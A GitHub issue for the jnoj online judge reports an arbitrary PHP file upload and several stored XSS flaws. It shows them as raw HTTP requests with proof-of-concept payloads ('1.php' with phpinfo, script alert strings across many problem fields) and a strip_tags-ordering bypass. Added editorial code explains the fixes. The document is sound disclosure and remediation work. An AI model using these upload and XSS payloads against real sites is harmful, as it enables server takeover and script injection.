shi-yang / jnoj

Jiangnan Online Judge
https://www.jnoj.dev

Multiple security issues #51

Closed thiscodecc closed 5 years ago

thiscodecc commented 5 years ago

1. Arbitrary file upload.

Code location: namespace app\modules\polygon\controllers\ProblemController, lines 213 to 228.

```php
public function actionTests($id)
{
    $model = $this->findModel($id);
    $solutionStatus = Yii::$app->db->createCommand("SELECT * FROM {{%polygon_status}} WHERE problem_id=:pid AND language IS NULL", [
        ':pid' => $model->id
    ])->queryOne();
    if (Yii::$app->request->isPost) {
        // Normalise CRLF to LF inside the uploaded temp file.
        $inputFile = file_get_contents($_FILES["file"]["tmp_name"]);
        file_put_contents($_FILES["file"]["tmp_name"], preg_replace("(\r\n)","\n", $inputFile));
        // The destination file name is taken verbatim from the client-supplied
        // $_FILES["file"]["name"]: no extension or content check, and the "@"
        // silences any failure.
        @move_uploaded_file($_FILES["file"]["tmp_name"], Yii::$app->params['polygonProblemDataPath'] . $model->id . '/' . $_FILES["file"]["name"]);
    }
    return $this->render('tests', [
        'model' => $model,
        'solutionStatus' => $solutionStatus
    ]);
}
```

Send an HTTP request with the following content:

```http
POST /jnoj/web/polygon/problem/tests?id=2&file= HTTP/1.1
cache-control: no-cache
Postman-Token: b3ac3880-1ebb-4446-8692-a1a7908d38fa
User-Agent: PostmanRuntime/7.6.0
Accept: */*
Host: 192.168.214.148:8111
Cookie: ckCsrfToken=y0nXbPW5yO2ZYYahLA4d6g4Vh5qhE3Esw9hHiZMI; _identity=0c02f9edeeebe8f90ed3b999269175b42d95229042b2abafccb9fcde4c391d22a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22aKH9oer3-sKQJi5ORU3VZh-CFlncQcdY%22%2C2592000%5D%22%3B%7D; _csrf=7773de4119f34c2949dcf5dc278c13290296d8d5de3a25a753ff95dcfab4f935a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22GRGF6U3QFJxl7NAUg2xkrE85e_mRCOA7%22%3B%7D; PHPSESSID=nh6rh8731c2702be06d9ug3klt
Accept-Encoding: gzip, deflate
content-type: multipart/form-data; boundary=--------------------------993388030406276728804269
Content-Length: 232
Connection: close

----------------------------993388030406276728804269
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php

echo phpinfo();

?>
----------------------------993388030406276728804269--
```

After the request succeeds, visit the URL:

[screenshot]

2. Stored XSS in the title field when creating a problem.

Payload

```http
POST /jnoj/web/polygon/problem/create HTTP/1.1
Host: 192.168.214.148:8111
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15" onclick="alert(1)" a"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close
Referer: http://192.168.214.148:8111/jnoj/web/polygon/problem/create
Cookie: PHPSESSID=78t6a2u2kgqeo8gmorcc2srtgl; _csrf=153510a10229399e40f5bb7c7733d4c9a6e924add34f0113bd20bbffc3d1d13ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22MfPPyjq_kQfKiWsTx4OYa3tUGHmbYZCw%22%3B%7D; _identity=8092f836542b046b6931fe23757d80e603cc4ec9851f04cdd215f688d8c3f823a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B5%2C%22uICh19XRxE7EeTALERQH8FAGwXu9J51j%22%2C2592000%5D%22%3B%7D
Upgrade-Insecure-Requests: 1

_csrf=wtOLGZhaHk5SqjzsMg6kdf_zGesVri1U1cqASZiZS_iPtdtJ4TBvETn7WqdbWdchh8dWsnSdWQGSgu0rwcMIjw==&Problem[title]=aaaabbbb<script>alert('xss')</script>aaaabbbb
```

Viewing the problem title list is enough to trigger it.

[screenshot]

3. The problem detail page has XSS in several places. Edit the title and add or modify the content. Some of the parameters here are escaped from HTML tags into HTML entities by the front end and then sent to the PHP back end. Writing it this way is very unsafe: capture the request and modify the corresponding parameters and that is all it takes, so escaping tags on the front end is meaningless. The modified parameters are as follows.

Payload

```http
POST /jnoj/web/polygon/problem/update?id=7 HTTP/1.1
Host: 192.168.214.148:8111
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15" onclick="alert(1)" a"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1426
Connection: close
Referer: http://192.168.214.148:8111/jnoj/web/polygon/problem/update?id=7
Cookie: PHPSESSID=78t6a2u2kgqeo8gmorcc2srtgl; _csrf=153510a10229399e40f5bb7c7733d4c9a6e924add34f0113bd20bbffc3d1d13ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22MfPPyjq_kQfKiWsTx4OYa3tUGHmbYZCw%22%3B%7D; _identity=8092f836542b046b6931fe23757d80e603cc4ec9851f04cdd215f688d8c3f823a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B5%2C%22uICh19XRxE7EeTALERQH8FAGwXu9J51j%22%2C2592000%5D%22%3B%7D
Upgrade-Insecure-Requests: 1

_csrf=HgqxnDZE_N9BxUyJK4RbVDrSWuzPm90WE3rQuLHtVmxTbOHMTy6NgCqUKsJC0ygAQuYVta6oqUNUMr3a6LcVGw==&Problem[title]=aaaabbbb<script>alert('xss')</script>aaaabbbb&Problem[time_limit]=1&Problem[memory_limit]=128&Problem[description]=<p>asd<script>alert('xss02')</script>;aaaabbbb</p>&Problem[input]=<p>aaaabbbb<script>alert('xss03')</script>&gt;aaaabbbb</p>&Problem[output]=<p><script>alert('xss04')</script>aaaabbbb</p>&Problem[sample_input]=aaaabbbb<script>alert('xss 05')</script>aaaabbbb&Problem[sample_output]=aaaabbbb<script>alert('xss 06')</script>aaaabbbb&Problem[sample_input_2]=aaaabbbb<script>alert('xss 07')</script>aaaabbbb&Problem[sample_output_2]=aaaabbbb<script>alert('xss 08')</script>aaaabbbb&Problem[sample_input_3]=aaaabbbb<script>alert('xss 09')</script>aaaabbbb&Problem[sample_output_3]=aaaabbbb<script>alert('xss 10')</script>aaaabbbb&Problem[spj]=&Problem[spj]=0&Problem[hint]=<p><script>alert('xss14')</p>&Problem[tags]=aaaabbbb<script>alert('xss 12')</script>aaaabbbb
```

Viewing the problem details triggers the XSS code 6 times.

[screenshot]

The 6 are concentrated here:

[screenshots]

The PHP back end's filtering rule for the hint parameter is as follows:

namespace app\modules\polygon\models\Problem, line 123:

```php
$hint = preg_replace("/(\s|\&nbsp\;| |\xc2\xa0)/", '', strip_tags($this->hint));
```

Written this way it can be bypassed, because the HTML tags are stripped first and the replacement is performed afterwards.

[screenshot]

When this parameter is output on the front end, the front end also filters it once, so this had no effect.

I had a look and the admin backend also has a few XSS vulnerabilities.

4. When creating a problem in the admin backend, the HTTP request is as follows:

```http
POST /jnoj/web/admin/problem/create HTTP/1.1
Host: 192.168.214.148:8111
Content-Length: 847
Cache-Control: max-age=0
Origin: http://192.168.214.148:8111
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.214.148:8111/jnoj/web/admin/problem/create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ckCsrfToken=y0nXbPW5yO2ZYYahLA4d6g4Vh5qhE3Esw9hHiZMI; _identity=0c02f9edeeebe8f90ed3b999269175b42d95229042b2abafccb9fcde4c391d22a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22aKH9oer3-sKQJi5ORU3VZh-CFlncQcdY%22%2C2592000%5D%22%3B%7D; _csrf=7773de4119f34c2949dcf5dc278c13290296d8d5de3a25a753ff95dcfab4f935a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22GRGF6U3QFJxl7NAUg2xkrE85e_mRCOA7%22%3B%7D; PHPSESSID=itcn06esd5pbvo9173rcidfmbl
Connection: close

_csrf=uFlAFx9vAKQeVYitGnbYYkvqpzI2IseyK6l2-C1MwKP_CwdRKToz9Vgf8MEtOJk3LNjfWURn_4dO9huqbgOBlA==&Problem[id]=123&Problem[title]=<script>alert('xss')</script>&Problem[time_limit]=1&Problem[memory_limit]=128&Problem[status]=&Problem[status]=0&Problem[description]=<p>&nbsp;</p>&Problem[input]=<p>&nbsp;</p>&Problem[output]=<p>&nbsp;</p>&Problem[sample_input]=<script>alert('xss')</script>&Problem[sample_output]=<script>alert('xss')</script>&Problem[sample_input_2]=&Problem[sample_output_2]=&Problem[sample_input_3]=&Problem[sample_output_3]=&Problem[spj]=&Problem[spj]=0&Problem[hint]=<p>&nbsp;</p>&Problem[source]=&Problem[tags]=&Problem[contest_id]=
```

Triggering page:

[screenshots]

5. Admin settings page: after XSS code is added on the settings page, every page in both the front end and the admin backend triggers it.

[screenshots]

The latter two admin-backend XSS vulnerabilities require logging into the admin backend, so they are low risk.
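Editorial example, not part of thiscodecc's report and not jnoj's code. It reproduces the line-123 hint filter quoted above so the two steps can be watched separately, showing why "strip_tags() first, whitespace removal second" lets a tag through, and then shows the output-side escaping that stops the stored XSS in the title, sample and tag fields of items 2 to 5. The function names are mine, and the view snippet in the closing comment is an assumed layout, not something taken from jnoj's templates.

```php
<?php
// Added example, not jnoj code. Runs stand-alone with php-cli.

// The line-123 filter, reproduced so the two steps can be observed separately.
function hintFilter(string $hint): string
{
    return preg_replace("/(\s|\&nbsp\;| |\xc2\xa0)/", '', strip_tags($hint));
}

// strip_tags() only opens a tag when "<" is immediately followed by a
// non-whitespace byte; "< script>" is copied through as plain text. The
// whitespace removal that runs afterwards then closes the gap, so the output
// of the filter contains a tag that its input did not.
$payload = "< script>alert(1)< /script>";            // constructed test input
printf("input:            %s\n", $payload);
printf("after strip_tags: %s\n", strip_tags($payload));   // unchanged
printf("after filter:     %s\n", hintFilter($payload));   // <script>alert(1)</script>

// Removing whitespace before strip_tags() closes this particular gap, but the
// PHP manual documents strip_tags() as unsuitable for XSS prevention, so it is
// not a sanitizer in either order.
function hintFilterReordered(string $hint): string
{
    return strip_tags(preg_replace("/(\s|\&nbsp\;| |\xc2\xa0)/", '', $hint));
}
printf("reordered:        %s\n", hintFilterReordered($payload));   // alert(1)

// What actually fixes the reported fields: store the raw input, escape at the
// point of output. For plain-text fields (title, sample_input, tags, ...) this
// is the same htmlspecialchars() call that yii\helpers\Html::encode() makes.
function escapeForHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$title = "aaaabbbb<script>alert('xss')</script>aaaabbbb";   // title payload from the report
$attr  = "x\" onclick=\"alert(1)";                          // constructed attribute-context variant
printf("text context:     %s\n", escapeForHtml($title));
// aaaabbbb&lt;script&gt;alert(&#039;xss&#039;)&lt;/script&gt;aaaabbbb
printf("attr context:     <input value=\"%s\">\n", escapeForHtml($attr));
// <input value="x&quot; onclick=&quot;alert(1)">

/*
 * Fields that are meant to carry editor HTML (description, input, output, hint)
 * cannot be encoded wholesale; run them through an HTML sanitizer at output
 * instead, e.g. yii\helpers\HtmlPurifier::process(). In a Yii view this looks
 * like the following (assumed layout, not jnoj's own template):
 *
 *   <h1><?= Html::encode($model->title) ?></h1>
 *   <div class="description"><?= HtmlPurifier::process($model->description) ?></div>
 */
```

The point of the first half is that neither step of the filter is an HTML parser: strip_tags() decides what a tag is by its own rules, and the whitespace pass afterwards can manufacture byte sequences that strip_tags() never saw. Escaping or purifying at render time sidesteps that entirely, because the stored value is never interpreted as HTML unless a sanitizer has approved it.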

thiscodecc commented 5 years ago

The code in app\modules\admin\controllers\ProblemController, lines 307->317, also has an arbitrary file upload.
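Editorial example, not part of thiscodecc's report and not jnoj's code: a hardened replacement for the upload branch of actionTests() in item 1, which applies equally to the admin ProblemController upload mentioned in this follow-up. It keeps the original CRLF normalisation and the move_uploaded_file() call, but validates the client-supplied name against an allow-list before anything is written. Assumptions, mine and not the project's: test data files are plain text named like "1.in", "1.out", "1.ans" or "notes.txt", the problem data directory is outside the web root or configured so that nothing in it is ever executed, and the 64 MiB cap is illustrative.

```php
<?php
// Added example, not jnoj code. Runs stand-alone with php-cli; the storeTestFile()
// path needs a real multipart request because of is_uploaded_file().

const ALLOWED_EXT = ['in', 'out', 'ans', 'txt'];   // assumed allow-list
const MAX_UPLOAD_BYTES = 64 * 1024 * 1024;          // assumed size cap

/**
 * Validate the client-supplied name and return the only form that will be written.
 * - path components are dropped (PHP already strips them from $_FILES, basename()
 *   keeps this independent of that behaviour);
 * - exactly one dot is allowed, so "shell.php.in" is rejected outright rather than
 *   relying on the web server not treating ".php" in the middle of a name as a
 *   handler extension (Apache's AddHandler does);
 * - the extension must be on the allow-list; the Content-Type sent by the client
 *   ("image/png" in the report) is never consulted.
 */
function safeTestFileName(string $clientName): string
{
    $name = basename(str_replace('\\', '/', $clientName));
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,8})$/', $name, $m)) {
        throw new InvalidArgumentException("rejected file name: $clientName");
    }
    if (!in_array(strtolower($m[1]), ALLOWED_EXT, true)) {
        throw new InvalidArgumentException("extension not allowed: $clientName");
    }
    return $name;
}

/**
 * Store one entry of $_FILES under $problemDir and return the final path.
 * Every failure throws instead of being silenced with "@".
 */
function storeTestFile(array $file, string $problemDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error code ' . ($file['error'] ?? 'none'));
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('file too large');
    }
    $name = safeTestFileName($file['name']);

    // Same CRLF -> LF normalisation as the original, done on the temp file
    // before the move.
    $data = file_get_contents($file['tmp_name']);
    file_put_contents($file['tmp_name'], str_replace("\r\n", "\n", $data));

    if (!is_dir($problemDir) && !mkdir($problemDir, 0750, true)) {
        throw new RuntimeException("cannot create $problemDir");
    }
    $dest = rtrim($problemDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException("cannot move upload to $dest");
    }
    chmod($dest, 0640);   // data only, never executable
    return $dest;
}

// In the controller the POST branch would become (assumed wiring):
//
//   if (Yii::$app->request->isPost && isset($_FILES['file'])) {
//       try {
//           storeTestFile($_FILES['file'], Yii::$app->params['polygonProblemDataPath'] . $model->id);
//       } catch (Throwable $e) {
//           Yii::$app->session->setFlash('error', $e->getMessage());
//       }
//   }

// Offline check of the name validation, including the "1.php" name from the report.
$cases = [
    '1.php'        => false,   // the reported payload
    '1.in'         => true,
    'a.IN'         => true,    // extension compared case-insensitively
    '../../x.in'   => true,    // reduced to "x.in"
    'shell.php.in' => false,   // double extension
    'x.in.php'     => false,
    '.htaccess'    => false,
];
foreach ($cases as $input => $shouldPass) {
    try {
        safeTestFileName($input);
        $ok = $shouldPass;
    } catch (InvalidArgumentException $e) {
        $ok = !$shouldPass;
    }
    printf("%-14s %s\n", $input, $ok ? 'ok' : 'UNEXPECTED');
}
```

The name check is deliberately an allow-list on a tight pattern rather than a block-list of dangerous extensions; a block-list would have to track every handler mapping of every web server the project might be deployed behind. Even with the check, the data directory should not be reachable through the web server with script execution enabled, since the content of an accepted ".in" file is still attacker-controlled.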